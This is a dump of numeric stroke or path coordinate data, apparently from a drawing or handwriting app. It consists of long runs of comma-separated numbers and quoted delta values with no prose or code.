1,-35-17-1,-1 0 17,1 0-17,0 0-15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19.0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173 15663 0,'0'0'0,"177"36"0,35-1 16,-1 0-16,1-35 15,0 0 1,-1 0-16,1 0 0,35 0 15,-18 0-15,53 0 16,406 0 0,-353 0-16,336 0 31,-495 0-31,53 0 16,-70 35 15,-141-17 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20.6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81 1499 0,'-53'0'15,"0"0"-15,-18 0 16,1 0-1,-36 0-15,-176 71 32,105-1-32,-17 1 15,0 35-15,-35 0 0,17 70 16,-299 265 0,-495 423 15,618-581-16,159-19 17,229-211-17,652 0 32,-158-53-47,-70-212 31,-283 1-15,-106-407 15,-88 512-15,0-17-16,-88-230 16,35 230-1,36 17-15,17 35 0,18 54 16,35-1-1,-36 18-15,19 0 16,-89 71 0,71 17-16,-36 247 31,36-106-31,17 283 16,18-230-16,0 300 31,35-353-31,106 159 15,-35-229 17,-88-159-1,0 0-15,158-247-1,-105 106-15,281-494 31,-158 176-31,53-87 0,-35 52 16,229-494 15,-353 794-31,18 53 16,-53 35-16,-36 35 16,1 54-16,-18-1 15,0 36 32,0 17-47,35 0 16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27.1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04 2064 0,'17'0'187,"71"-18"-171,-52 18-16,17-18 15,17 18-15,124-35 32,-35 18-17,247 17 1,-124 0-1,-4127 0 17,8096 0-17,-4216 0 1,141 0 15,1 0 0,-54 0-15,-17-18 0,-35 18-16,140-18 31,160 18-15,-1-53 15,-88 36-16,-229 17-15,71 0 32,-89 0-32,-17 0 15,-1 0 48,1 0-32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5:38.8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75 11906 0,'18'0'78,"70"0"-78,53 0 16,0 0-16,18 0 15,-18 0 1,212 0-1,-36 0 17,54 0-17,52 0 17,36 0-17,-195 18 16,266 52-15,-283-17 15,-124-35-31,-17-18 0,17 18 16,18-1-16,18 19 16,18-36-16,-1 35 15,-17-18-15,176 19 16,18-19 15,-18-17-15,88 0-1,406 0 17,-423 18-17,-247-18-15,599 0 47,-564 0-47,247 0 31,-176 0-15,17 0 0,-18 0-1,918 0 32,-882 0-47,617 18 31,-246-18-15,-301 0 15,-299 0-15,17 0 15,18 0-15,35-53 15,-18 17-15,124-87 15,-176 105-16,140-17 17,-175 35-1,34 0-15,-35 0-16,18-18 31,-35 18-31,17-17 15,-17-1-15,35 1 32,-36-1-32,54 0 15,70 1 17,0-19-32,0 19 0,-35 17 15,-35-18-15,-4093 0 16,8150-17-1,-4075 35-15,-18-35 16,-4004-36 0,8114 36-16,-3845-53 47,-229 53-47,-19 17 15,-16 0 1,17 1-16,17-19 31,-52 36-31,17-17 16,265 17 31,-282 17-1,-1 1-30,19 0 15,-19-1-31,71 19 47,-35-36-31,18 17-1,-4128 1 1,8167-1 15,-4110 1 1,17-18-17,-17 35 16,0 36-15,0 17 15,-17 18-15,17-88-16,0-1 31,0 1 16,-18-18-31,1 70 15,17-52-31,0 0 16,0-1-16,-18-17 15,18 18 32,0 0-31,0-1 15,0 1-15,18 0 15,-1-18 0,-17 17 16,18-17 3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1:38.3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29 15421,'37'0,"-1"0,18 0,1 0,35-18,1 18,-36 0,17 0,1 0,-1 0,-17 0,17 0,1 0,-19 0,1 0,-1 0,1 0,-19 0,18 0,-17 0,-1 0,0 0,0 0,19 0,17 0,1 0,-19 0,37 0,-18 0,-1 0,19 0,-18 0,17 0,-17 0,-19 0,1 0,-19 0,0 0,-18 0,1 0,-1 0,0 0,0 0,0 0,0 0,37 0,-19 0,0 0,-18 0,37 0,-37 0,36 0,-35 0,-1 0,0 0,18 0,-18 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,18 0,-18 0,0 0,0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7:39.7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15 1517 0,'18'0'78,"17"-18"-62,36 18-16,34 0 15,37 0-15,52 0 16,17 0-16,1 0 16,0 0-16,70 0 15,-35 0-15,53 0 16,-18 0 0,-4092 0-16,8202 0 0,-4145 0 15,35 0-15,18 0 16,-53 0-16,53 0 15,-53 0-15,-36 0 16,1 0-16,-18 0 16,-35 0-1,-18 0-15,18 0 0,-18 0 16,0 0-16,0 0 16,0 0-1,36 0-15,-19 0 16,36 0-16,36 0 15,-19 0-15,-17 18 16,-53 0-16,1-1 16,-19 1-16,18-18 15,0 0-15,0 18 16,0-18-16,36 52 16,-18-52-16,-1 18 15,19-18-15,-19 18 16,19-18-16,-36 0 15,18 0-15,-18 0 16,18 0-16,35 17 16,0-17-1,-18 18-15,36-18 0,-36 0 16,0 0-16,18 0 16,-35 0-1,18 0-15,-19 0 0,1 0 16,35 0-1,-35 35-15,17-17 16,-17 0-16,35-1 16,-53 1-16,18-18 15,17 0-15,-35 0 16,1 17-16,-1-17 16,0 0-16,18 0 15,17 0-15,-17 0 16,-1 18-16,72 17 15,299-17 1,-388-18 0,-35 0-16,-53 0 15,-36 0-15,1 0 16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7:48.4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21 7567 0,'35'18'94,"36"-18"-78,70 17-16,0 1 15,53-18-15,0 0 16,-17 0-16,17 18 16,-71-18-16,1 17 15,-71 1-15,17 0 16,-52-18-1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7:50.4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250 4180 0,'-18'18'47,"36"0"-31,70-18-16,106 35 15,35-17-15,71-1 16,17 36-16,-17-35 16,-17-18-16,-19 0 15,-105 17-15,-36-17 16,71 0 0,-123 0-16,-18 0 15,53 0-15,17 0 16,18 0-16,18 0 15,17 0-15,1 0 16,17 0-16,0 0 16,-35 0-16,17 0 15,318 0 1,-353 0 0,35 0-16,-17 0 15,0 0-15,17 0 16,1 0-16,34 0 15,-17 0-15,-35 0 16,35 0-16,0 0 16,-17 0-16,17 0 15,-18 0-15,0 0 16,-17 0-16,0 0 16,17 0-16,-35 0 15,0 0-15,18 0 16,-18 0-1,0 0-15,-17 0 16,-36 0-16,36 0 16,-36 0-16,35 0 15,-17 0-15,0 0 16,0 0-16,-18 0 16,-17 0-16,-1 0 15,18 0-15,-35 0 16,-18 0-16,18 0 15,-35 0-15,17 0 16,-17 0-16,0 0 63,-1 0 46,18 0-109,1 0 16,34 0-16,1 0 15,-3969-17 1,8184 17-16,-4127 0 15,-1 0-15,-16 0 16,-37 0-16,-69 0 16,-19 0-16,1 0 93,17 0-77,0 0-16,36 0 16,-18 0-16,17 0 15,19 0-15,52 0 16,0 0-16,71 0 16,-1 0-16,19 0 15,34 0 1,-105 0-16,-71 0 0,-17 0 15,-54 0 48,-34 0 46,-19 0-109,19 0 16,-19 0-16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7:52.0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15 7743 0,'71'0'62,"-19"0"-46,37 0-16,52 0 16,18 0-16,35 0 15,17 0-15,-52 0 16,35 0-16,-53 0 16,-17 0-16,-54 0 15,1 0-15,-36 0 16,18 0-16,-35 0 15,34 0-15,-16 0 16,17 0-16,17 0 16,1 0-16,35 0 15,-36 0-15,-35 0 16,18 0-16,-35 0 16,35 0-16,-35 0 15,-1 0 1,-52 0 93,17 0-93,-35 18-1,36 0 1,17-36 31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07.9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0 4304 0,'17'0'78,"54"-18"-78,35 1 16,17-1 0,-17 18-16,335-35 31,-53 35-16,-212 0-15,-17 0 16,53 35 0,-18-17-16,688 87 31,-759-87-15,-35 0 3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12.8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33 8943 0,'-17'0'31,"-1"0"-15,1 0-1,-1 0 1,0 0 0,-70 0-16,35 0 15,-17 0-15,17 0 16,-18 0-16,1 0 15,-54 0 1,71 0-16,0 0 31,36 0-31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14.4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15 8802 0,'0'-18'15,"18"18"-15,17 0 16,0 0-16,71 0 16,212 0 15,193 0-15,354 0 15,581 0 0,36 0-15,-512 0-1,229 0 1,-5009 0 0,8202 0-16,-4092 18 15,-35 17-15,17 0 16,-53 18-1,-17-35-15,0 17 0,-18-35 16,-36 18-16,-16-1 16,-1-17-16,-36 0 15,-16 0-15,-19 0 16,-17 0-16,-18 0 16,18 0-1,124 0 1,17 36 15,123-1-15,89 18 15,-247 0-31,-71-53 16,18 0-16,-53 18 15,-18-18 1,-17 0 124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23.6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86 10389 0,'-17'0'31,"-1"18"1,0-18-17,-34 0-15,-19 0 16,0 0-16,-52 0 15,-336 0 17,354 0-17,69 0 32,19 0-16,-1 0-15,0 0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25.5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80 10478 0,'18'-18'0,"-1"0"31,1 18-31,141 0 15,229 0 17,300 53-1,-142-35-15,-263-18-16,1057 17 46,-1093-17-46,670 18 47,-740 0-47,369 70 32,-175-53-17,-177 18-15,353 18 31,-371-54-31,-17 19 16,599 69 31,-687-105-47,141 36 31,-71-19-15,0 1 15,-35-18-15,-54 0-16,160 0 31,-124 0-31,212-124 31,35-17-15,-141 124-1,142-1 17,-4305 18-1,8079 0-31,-4075 0 16,-17-18-1,-1 18 1,1-17 15,-1 17-15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26.8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57 12718 0,'-18'0'94,"1"0"-94,-19 0 15,-34 0-15,-18-18 16,-124 0 0,-229 18-1,106-17 17,247 17-1,70-18 94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2:29.2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20 4405 0,'20'0'32,"20"0"-17,-1 0-15,120 0 16,79 0-16,20 0 15,0 0-15,40 0 16,-40 0-16,-20 0 16,-20 0-16,-19 0 15,-41 0-15,-39 0 16,-19 0-16,-21 0 16,-19 0-16,-21 0 15,21 0 1,-20 0-16,-21 0 15,21 0-15,0 0 16,19-20-16,1 20 16,19 0-16,20 0 15,1 0-15,-1 0 16,20 0-16,-60 0 16,-19 0-16,-20 0 15,0 0 48,0 0-32,-1 0 16,1 0-47,0 0 15,0 0 1,20 0 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28.3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32 13070 0,'0'-17'93,"0"-1"-93,18 18 16,52 0-16,36 0 16,335-17-1,-18-36 16,565 53-15,-564 0 15,-248 0-31,300 0 16,-352 0 0,-36 0-16,-18 0 15,-17 0-15,0 0 16,-17 0-1,-1 0-15,-18 0 16,19 0 15,34 0 16,-52 0-47,0 0 31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29.5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541 12929 0,'53'0'32,"53"18"-17,-18-18 1,18 18-16,35-1 0,-17 1 15,17 0 1,0-1-16,-4057-17 16,8132 0-16,-4022 0 15,0 0-15,-18 0 16,353 0 0,-282 0-1,-17 0-15,616 0 31,-687 0-31,-18 0 16,388 71 15,-229-54-15,176-17 15,-264 0-15,-53 0 31,-142 0 0,1 0-32,53 0 16,-36 0-15,71 0 0,-4075 0 15,8079 0-15,-4075 0-1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6:59.4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63 14270 0,'18'0'15,"0"-18"48,-1 18-48,19 0-15,34-17 16,54-1-16,-1 0 16,247 18-1,-158 0-15,-18 0 16,0 0-16,-88 0 16,0 0-1,-89 0-15,-52-17 31,-53 17-31,-18-18 16,36 18 0,-1-35 15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00.6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39 14270 0,'70'0'32,"54"0"-17,-1 0-15,18 0 16,36 0-16,34 0 16,760 0 15,669 35-16,582-17 32,-1957-18-47,282 0 32,-335 0-17,-160-18 16,-34 18 110,17 0-125,-17 0-16,17-17 15,53 17 1,54-18 15,-72 18-15,-52 0-1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01.5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92 15593 0,'0'0'0,"-18"0"16,1 0 0,-1 0-1,1 0 1,-19 0-16,-52 0 31,-53 17-15,88 1 15,-35-18-15,-71 0 15,71 0-31,0 0 0,-18 0 16,-18 0-16,-34 0 31,87 0-31,18 0 0,0 0 15,36 0 1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10.0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324 15804 0,'0'0'0,"-53"0"15,0 0-15,0 0 16,0 0-16,-52 0 31,-36 0-15,-4216 0 15,7937 0 0,-4038 0-15,334 0-16,-70 0 31,124 0-31,17 0 16,0 0-16,-18 0 15,-17 0-15,-35 0 16,-354 0 0,195 0 15,159 0-31,-159 0 16,211 0-1,-17 0 1,35 18-1,35-18 142,-35 18-157,0-18 15,-35 17 1,0-17-16,-159 0 16,-106 0 15,230 0 0,105 0 47,1 0-62,-19 0-1,1 0-15,17 0 16,-35 0-16,1 0 16,-636 0 31,617 0-47,36 0 46,52 0 126,1 0-172,0 0 16,-1 0 31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8:00.5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66 1905 0,'18'-18'31,"17"18"-15,35 18-16,36 17 15,71 1-15,-19-1 16,54-35-16,17 0 16,89 0-16,35 0 15,-18 0 1,0 0-16,-70 0 0,17 0 15,53 0-15,-18-18 16,-34 18-16,69 0 16,-69 0-1,-19 0-15,18 0 16,-52 18-16,-19 17 16,-17 18-16,-17-18 15,-36-17-15,-18 17 16,-34-17-16,16-1 15,-52-17-15,-17 0 16,17 0-16,-36 0 16,1 0-16,-1 0 47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7:19.5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69 1869,'19'0,"53"0,19 0,54 0,73 0,-37 0,164 0,90 0,110 0,17 36,-72-18,36 55,36-19,55 73,-91-36,-145-19,146 19,-183-18,-17-1,-128-17,-35-19,-74-18,-53 0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7:20.8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0 4554,'0'0,"36"0,37 0,36 0,72 0,0 0,73 0,0 0,73 0,-19 0,55 18,0 0,-91-18,-36 36,-73-36,19 0,-91 0,-19 0,-36 0,-17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15.0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34 4498 0,'18'-18'78,"-1"18"-78,36 0 16,-17 0-16,34 0 16,71 0-1,-52 0-15,34 0 16,0 0-16,-34 0 16,140 0-1,-141 0-15,36 0 16,-36 0-16,-18 0 15,301 0 17,-283 0-17,229 0 17,-158 18-17,-71 0 16,-35-18-15,53 0 15,229 0 1,-229 0-32,0 0 15,229 0 16,0 0 1,-229 0-32,-35 0 15,-18 0-15,-18 0 16,-18 0-16,1 0 16,0 0 77,-1 0-77,1 0 0,0 0 15,-36 0 125,0 0-156,-17-18 16,0 0-16,17 1 15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2:33.5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291 4365 0,'20'0'16,"0"0"15,0 0-16,-1 0 1,41 0-16,59 0 16,99 0-16,-59 0 15,40 0-15,19 0 16,-59 0-16,-1 0 16,-39 0-16,-19 0 15,-21 0-15,-39 0 16,-20 0-16,-1 0 15,1 0 1,0 0 0,0 0 15,20 0-15,-21 0-16,1 0 15,20-19-15,-20 19 16,-20-20-16,20 20 15,-1 0-15,1 0 32,20 0-32,0 0 15,-1 0-15,1 0 16,-20 0-16,0 0 16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17.5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09 6050 0,'18'-18'31,"52"18"-16,71 0-15,106 0 16,-17 0-16,-19 0 16,371 0-1,-158-35 17,-301 35-32,1 0 15,-1-17-15,-17 17 16,17 0-1,18 0-15,1 0 16,175 0 0,177 0-1,-353 0 1,159 0 31,-282 0-47,-1 0 78,1 0-62,0 0-1,87 0 16,-52 0-31,177 0 32,-142 0-17,-71 17 48,-17 1-16,-52-18-47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19.8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89 6156 0,'35'0'94,"0"0"-78,18 0-16,35 0 15,54 0-15,16 0 16,230 0-1,71 0 1,-212 0 15,-194 0-15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0.4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34 6174 0,'18'0'0,"0"-18"15,-1 18-15,1 0 16,176 0 15,212 0-15,87 18 15,-16-1-15,-248-17 15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1.1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309 6050 0,'53'0'62,"18"0"-62,52 0 16,53 0 0,1 18-16,87 17 15,1 0-15,-36-35 16,830 0 15,-971 0-15,-18 0-16,-34 0 15,-19 0-15,1 0 16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2.3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68 9366 0,'-17'0'47,"-54"0"-47,1-17 16,-36-1-16,0 18 15,-17-18-15,-19 18 16,1 0 0,0 0-16,35 0 15,53 0-15,36 0 31,-1 0 16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6.4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90 9454 0,'18'-17'47,"52"17"-31,36 0-16,18 0 15,-19 0-15,301 0 32,-124 0-17,-141 0-15,195 0 31,-213 0-31,-17 0 16,17 0-16,195 0 31,-230 0-31,18 0 16,141 0 15,-177 0-15,-17 0-16,53 17 15,-53-17 1,-18 0-16,1 18 16,-19-18-16,36 0 15,18 18 1,-36-18 15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7.4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45 12259 0,'0'-18'15,"-18"1"1,0 17 0,-52-18-1,-1 18-15,-140-18 32,52 18-32,-17 0 0,-1 0 15,-176 0 16,177-17-31,35-1 16,0-17-16,105 35 16,19 0 156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29.0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96 12400 0,'18'-18'15,"-1"18"1,1 0-16,35-17 15,-36-1 1,89 1 15,53 17-15,-71 0-16,36 0 16,-18 0-16,705 0 46,-564 0-46,458 0 32,-281 17-17,-213 18 17,-140-35-17,-53 0 16,-1 0 1,1 0-17,17 0 1,0 0 15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35.7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358 9419 0,'35'0'47,"18"-17"-47,35-1 15,512 18 16,-423 0-31,17 0 16,582 0 15,-265 0-15,389 0 15,-371 0 0,-388 0-31,-3916 0 32,8026 0-32,-3827 0 15,-195 0 1,0 0-16,1 0 16,34 0-16,124 0 31,-176 0-31,35 0 15,-159 0-15,0 18 16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37.6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547 10777 0,'0'-17'78,"17"-1"-62,1 18-1,35 0-15,141-35 32,353 17-17,405 18 32,-881 0-47,-1 0 31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2:35.2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19 4465 0,'20'0'79,"0"0"-48,0 0-31,0 0 15,39 0-15,1 0 16,39 0-16,20 0 16,-20 0-16,0 0 15,20 0-15,-19 0 16,19 0-16,-20 0 16,20 0-16,0 0 15,-20 0-15,-59 0 16,20 0-16,-1 0 15,-39 0-15,0 0 16,0 0-16,-1 0 16,1 0-1,0 0 63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56.2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552 12118 0,'53'-18'78,"0"18"-78,53 0 16,0 0-16,35 0 15,35 0 1,0 0-16,19 0 0,34 0 16,-70 0-1,35 0-15,17 0 16,389 53 0,-212 18-1,-194-36 1,0-17-16,0 17 15,18-17-15,-18 17 16,-18-18-16,-4056 1 16,8148 35-16,-4109-35 15,0-1-15,-36 1 16,195-18 15,-54 0-15,124 0 31,-282 18-47,159-1 31,-124 19-15,-53-36 15,18 0-16,141 0 32,-194 0-47,0 0 16,35-18 0,-4075 0-1,8327 18 32,-4287 0-31,17 0-16,1 0 0,-18 0 15,105 0 1,213 0 15,-4411 0-15,8150 0-16,-4074 0 15,-19 0-15,1 0 63,0 0-47,-1 0-1,1 0 16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7:57.6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74 13529 0,'0'0'0,"177"18"15,35 17-15,34-17 16,1-1-16,18 1 16,-36-18-16,1 0 15,34 0-15,371 0 31,-211 0-15,-230 0 15,-53 0-31,-106 0 16,0 0-16,-17 0 16,-1 0-16,1 0 15,0 0 48,17 0-48,-17 0-15,-1 0 16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8:01.8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92 15187 0,'-794'-18'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8:51.2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305 13458 0,'35'0'78,"1"18"-62,17 0-16,52-1 15,19-17-15,35 36 16,123-36-1,177 0 17,-89 0-17,-70 0 17,-71 0-17,-70 0 16,-106 0-31,0 0 16,0 0-16,-18 0 16,18 0-1,-36 0-15,1 0 16,35 0-16,-18 0 16,36 17-1,511 71 32,-459-70-47,-3897 0 31,7936-18-15,-4109 0 15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9:27.6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96 1746 0,'18'18'31,"35"0"-15,35-18-16,0 17 16,71 1-16,0 17 15,70 0-15,71 1 16,70 17-16,177-1 15,-53-16-15,141 17 16,53 17-16,35-17 16,53-53-16,36 0 15,52 35-15,18 71 16,0 0-16,-106-53 16,-123 35-16,-54 18 15,-52-18-15,0-35 16,-124 18-16,-158-18 15,17-18-15,-70-17 16,-71-1-16,-53 1 16,-35-1-16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52.8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56 1705,'18'0,"0"0,54 0,55 0,37 0,17 0,37 0,72 0,-54 0,54 0,55 0,-109 0,72 0,-72 0,-73 0,-17 0,-38 0,-35 0,-55 0,0 0,0 0,19 0,-1 19,55 17,36-18,18-18,54 54,1-35,0-19,-37 18,0-18,-18 0,0 0,-18 0,-18 36,-36-18,18 0,-73-18,0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54.2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94 4626,'18'0,"0"0,55 0,54 0,18 0,91 0,-18-36,90 18,-36-18,91 18,-73 18,1-55,-19 19,18 36,-36 0,-18 0,-18 0,-19 0,-54 0,-36 0,0 0,-36 18,-19 0,-36-18,19 0,-1 0,-18 0,0 0,18 0,-17 0,-19-18,18 18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8:57.2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93 4445 0,'53'0'188,"-36"0"-173,19 0-15,17 0 16,-18 0-16,18 0 16,70 0-1,1 0 16,-71 0-15,0 0 31,-36 0-47,36-18 47,-18 18-32,36-35 1,0 35 0,105-18-1,-105 18 1,317 0 15,-89-35-15,-52 18 15,-70 17-15,-18 0 15,-54 0-15,72 0-1,-107 0 1,1 17-16,-18-17 15,0 18-15,0-18 16,0 0 0,52 0-1,-52 0 17,-35 0-17,35 0 16,-4110 0-15,8167 0 15,-4075 0-15,-4074 0 15,8131 0-31,-4074 0 31,-1 0 1,1 0-17,0 0 17,-1 0 14,1 0 1,17 0-31,18 0 0,-35 0-1,87 17 16,-16 1-15,-72-18 15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8:59.9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74 9472 0,'-53'0'94,"0"0"-94,1 0 15,-19 18-15,0-18 16,-105 35 0,106-17-16,-54 35 15,36-36-15,53-17 16,-1 0 0,36 18 171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01.7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21 9507 0,'0'-17'78,"35"17"-62,18-18-16,17 18 16,54-18-16,-1-17 15,19 35-15,16 0 16,54 0-16,-53 0 15,70 0-15,18 0 16,617 0 0,-282 0 15,494 0-15,-723 0 15,-212 0-31,0 0 0,0 0 15,0 0-15,1 0 16,16 0-16,1 0 16,18 0-16,193 0 31,-17 0-15,317 0 30,-599 0-46,193 0 32,-105 0-17,53 0 1,-107 0-16,19 0 16,-18 0-16,229-17 31,-159 17-16,318 0 17,-53 0-17,0 0 17,-335 0-32,158 0 31,-246 0-16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3:10.9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1 7203 0,'19'0'94,"41"0"-94,39 0 16,0 0-1,21 0-15,-1 0 16,-20 0-16,40 0 16,-40 0-16,20 0 15,-79 0-15,59 0 16,0 0-16,-20 0 16,21 0-16,-41 0 15,1 0-15,-1 0 16,-19 0-16,-20 0 15,0 0-15,0 0 16,-1 0 484,1 0-484,0 0-16,59 0 0,21 0 15,39 0 1,-1 0-16,41 0 16,0 0-16,-40 0 15,-80 0-15,80 0 16,-20 0-16,-20 0 15,-19 0-15,39 0 16,-40 0-16,20 0 16,-19 20-16,39-20 15,20 0-15,-20 0 16,59 20-16,-98-20 16,-1 0-16,-19 0 15,-21 0-15,-19 0 16,0 0-16,0 0 15,0 0 17,-1 0-17,21 0-15,-20 0 16,0 0-16,0 0 16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9:29.0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66 1905 0,'35'0'16,"106"0"-16,54 0 16,34 0-16,53 0 15,106 0-15,141 0 16,-141 0-16,141 0 16,-52 0-1,52 0-15,0 0 16,0 0-16,-53 0 15,71 35-15,-88 18 16,-71-35-16,-106 35 16,-52-53-16,-89 0 15,-71 0-15,-52 0 16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28.0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04 4572,'0'0,"18"0,0 0,18 0,-17 0,-1-18,18 18,18 0,55 0,36 0,1-18,71 18,37 0,18 0,91-37,0 19,145-18,-18 36,18 0,36 0,-54 0,-236 0,18 0,-36 0,-36 0,-55 0,-54 0,-37 0,-18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29.0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15 4808,'36'0,"18"0,1-18,35 18,37-18,55 18,36-19,36 19,0-36,108 36,92-36,90 36,1 0,-1 0,91 0,-91 0,0 0,-108 0,-73 0,-73 0,-54 0,-18 18,-19 18,-72-36,-72 0,-37 18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35.8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15 1832,'18'0,"73"19,18-1,0-18,72 0,127 0,146 36,90-36,1 18,108-18,-127 0,91 36,36 55,-127-36,73-19,-55-36,0 36,-90-36,-146 18,-36-18,-126 0,-38 0,-53 0,-37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14.6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81 4604 0,'0'0'0,"0"-18"94,0 0-63,35 18-15,18 0-16,18-17 15,52-1-15,495 18 32,-460 0-17,1 0-15,-18 0 16,-17 0-16,-1 0 16,-35 0-16,-35 0 15,18 0 1,-4075 0 15,8149 0-15,-4127 0-16,-1 0 31,19 0-15,-19 0 15,1 0-16,0 0-15,17 0 16,35 0-16,160 0 31,-160 0-31,36 0 16,0 0-16,-18 0 16,-17 0-16,17 0 15,71 0 1,17 0 15,36 0 0,-18 0-15,-159-17 15,0 17 94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15.9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305 9119 0,'18'0'63,"52"18"-63,54-18 16,52 0-16,18 0 15,18 0-15,247 0 31,193 0-15,-140 0 15,-371 0-31,-18 0 0,1 18 16,-89-18-16,0 17 16,18-17-1,71 53 1,87-18 15,72 1-15,-36-1 15,-195-35-31,1 0 16,-17 0-16,-19 0 15,19 0 1,-19 0-1,1 0-15,-1 0 16,-17-18-16,18 18 16,17-35 31,-17 17-47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21.2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94 9190 0,'-18'0'31,"1"0"-15,-1 0-16,-17 0 16,0 0-16,-36 0 31,-123 0-16,0 0 1,53 0 0,-194 0-1,176 0-15,18 0 32,-36 0-32,-264 0 15,283 0 1,34 0-16,-299 0 31,229 0 0,-4251 0-15,8378 0 15,-4215 0-15,123 0 15,-176 0-15,265 0 15,34 0-31,1 0 0,0 0 16,0 18-1,17-18 1,-17 17-16,-18-17 15,0 0-15,-35 18 16,-18-18-16,-18 0 16,-246 0 15,17 0 0,336 0-31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9:40.2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350 9049 0,'-35'-36'31,"17"19"0,0 17-15,-35 0-16,-35 0 16,-35 0-16,-18 0 15,-1 0-15,1 0 16,0 0-16,18 0 15,-18 0-15,17 0 16,1 0-16,17 0 16,0-18-16,36 1 15,-1 17-15,-17 0 16,17-18-16,18 18 16,-17 0-16,17-18 15,-35 18-15,-1 0 16,19 0-16,-18 0 15,-18 0-15,18 0 16,-36 0-16,36 0 16,-18 0-16,36 0 15,17 0 1,17 0-16,19 0 0,-1 0 16,-17 0-1,17 0-15,1 0 16,-1 0-16,0 0 15,1 18-15,-1-18 32,0 0-17,1 18 1,-1-1-16,0-17 16,18 18-16,-17-18 15,-54 35 1,36-17-16,0-18 15,-1 0-15,19 0 16,-1 0-16,-17 17 16,17-17-16,-17 0 15,17 0-15,1 0 16,-1 0-16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53.6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4374 0,'35'-17'141,"18"-1"-141,53 18 15,35-17-15,318-1 47,-424 18-47,0 0 31,-17 0 1,17 0-17,1 0-15,105 0 47,-71 0-47,1 0 0,229 0 47,-247 0-47,88 0 31,35-18-15,406 1 31,-282 17-47,-53 0 47,-229 0-47,17-18 47,-17 18-47,-1 0 62,18 0-46,-17 0-1,123 0 17,-88 0-32,35 0 15,1 18-15,-37-18 16,19 0 15,-53 17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05.8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57 12153 0,'-18'0'16,"0"0"-1,-17 0 16,17 0-15,-87 0 15,52 0-31,-177 0 47,213 0-47,-89 18 47,88-18-47,-70 0 47,53 0-47,-18 0 31,35 0-31,-17 0 31,-18 0-31,18 17 16,17-17 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8:47.3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143 4844,'18'0,"37"0,53 0,38 0,-1 18,72-18,19 0,36 0,91 37,36-37,55 18,-37 18,73-36,-127 18,36-18,-36 55,-145-55,-19 0,-35 18,-56-18,-17 0,-55 0,-36 18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3:18.0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06 8294 0,'0'-19'31,"40"19"-15,20 0 0,19 0-16,40 0 15,40 0-15,-20 0 16,0 0-16,-80 0 16,60 0-16,40 0 15,-20 0-15,20 0 16,-1 0-16,41 0 15,39 0-15,20 0 16,20 0-16,0 0 16,19 0-16,-59 0 15,0 0-15,-39 0 16,-60 0-16,-40 0 16,-20 0-16,40 0 15,-79 0-15,119 0 16,-20 0-16,20 0 15,19 0-15,-19 0 16,-20 0-16,20 0 16,-21 0-1,-58 0-15,19 0 16,-39 0-16,-1 0 16,-19 0-16,-1 0 15,-19 0-15,40 0 16,-20 0-16,19 0 15,-19 0-15,19 0 16,21 0-16,19 0 16,0 0-16,40 0 15,-60 0-15,40 0 16,-59 0-16,-20 0 16,-1 0-16,-19 0 15,20-20-15,-20 20 16,0 0-1,-20-20-15,39 20 16,1 0-16,0 0 16,19 0-16,1 0 15,-21 0-15,1 0 16,-20 0-16,-20-20 16,40 20-16,-21 0 203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06.8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68 14552 0,'0'0'0,"-17"0"16,-1 0-1,1 0 1,-1 0 0,-17 0-16,17 0 15,-53 0 16,36 18-31,18-18 16,-1 0 0,-17 0-1,-1 0-15,-17 0 0,18 17 16,18-17 0,-1 0-16,-17 0 15,35 18-15,-36-18 16,1 0-16,-18 0 15,18 0-15,-18 0 16,18 0-16,17 0 47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18.3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47 12153 0,'18'0'62,"-1"0"-62,1-17 16,0 17-16,-1 0 16,54 0-1,0 0-15,-19 0 16,37 0-16,16 0 16,-16 0-16,52 0 15,-18 0-15,1 0 16,-18 0-1,-4093 0-15,8150 0 32,-4145 0-17,-18-18 110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0.9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69 12047 0,'18'0'0,"0"0"16,17 0-16,0 0 15,-17 0 1,141 0 15,70 0 0,-176 0-31,0 0 16,211 0 31,-193 0-47,123 0 31,-71 0-15,-17 0 15,-88 0-15,0 0 93,-1 0-93,1 0-16,-1 0 31,1 0-15,0 0 93,-1 0-78,1 0-31,0 0 16,35 0-1,0 0 17,-18 0 46,-18 0-63,1 0 17,0 0-17,-1 0 17,19 0-1,-19 0 141,1 18-141,0-18 250,-1 0-250,1 18-15,-1-18 15,1 0-15,0 0-16,17 0 16,-17 0-1,-1 0 48,1 0-48,0 0 32,17 0-16,-18 0 16,1 0-31,0 0 15,-4075 0-15,8149 0-1,-4074 0 1,-1 0 15,1 0-15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4.5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14 11765 0,'0'0'0,"-17"0"15,-1 0-15,1 18 16,-19-18-1,19 0-15,-107 0 32,-35 17-17,18 19 17,53-36-17,-53 17 16,106-17-15,17 18 0,-17-18-1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5.2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73 14499 0,'-17'0'0,"-1"0"31,-17 18-16,17-18 1,-17 0 0,-177 17-1,142-17 1,-1 0 0,-158 18-16,105-18 15,1 0-15,-1 0 16,54 0-16,-1 0 15,54 0 1,34 0 47,1 0-32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6.9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43 14429 0,'0'17'15,"18"-17"63,70 0-62,-18 0-16,54 0 16,-36 0-16,124 0 31,-89 0-31,159 0 16,-123 0-16,600 0 46,-618 0-46,494 0 47,-529 0-47,176 53 47,-247-53-31,124 0 15,17 0-15,54 0-1,-4093 0 1,8025 0 15,-4109 0-15,53 0 15,35 0 0,18 0-15,-53 0 0,35 18 15,-4163-1-31,8132-17 0,-4075 18 15,18-18-15,-17 0 16,17 0-16,52 0 31,-34 18-31,-18-18 0,17 17 16,-34 1 0,-19-18-16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8.6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34 14305 0,'-17'18'31,"87"-18"16,18 0-47,0 0 16,318 0 15,-265 0-31,212 0 31,-141 0-15,-177 0 15,-17 0 63,-1 0-94,1 0 16,0 0-1,-1 0 1,36 0 15,71 0-15,211 0 15,-4075 0-15,7956 0 15,-4198 0 94,-36 17-16,0-17-77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49:53.6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4374 0,'35'-17'141,"18"-1"-141,53 18 15,35-17-15,318-1 47,-424 18-47,0 0 31,-17 0 1,17 0-17,1 0-15,105 0 47,-71 0-47,1 0 0,229 0 47,-247 0-47,88 0 31,35-18-15,406 1 31,-282 17-47,-53 0 47,-229 0-47,17-18 47,-17 18-47,-1 0 62,18 0-46,-17 0-1,123 0 17,-88 0-32,35 0 15,1 18-15,-37-18 16,19 0 15,-53 17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24.5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14 11765 0,'0'0'0,"-17"0"15,-1 0-15,1 18 16,-19-18-1,19 0-15,-107 0 32,-35 17-17,18 19 17,53-36-17,-53 17 16,106-17-15,17 18 0,-17-18-1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46.9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45 7239,'0'0,"36"0,19 0,-19 0,36 0,37 0,18 0,18 0,1 0,71 0,-17 0,18 0,-37 0,19 0,-1 0,-17 0,17 18,-36-18,-17 0,35 0,-18 0,-18 0,1 0,-19 0,-19 0,1 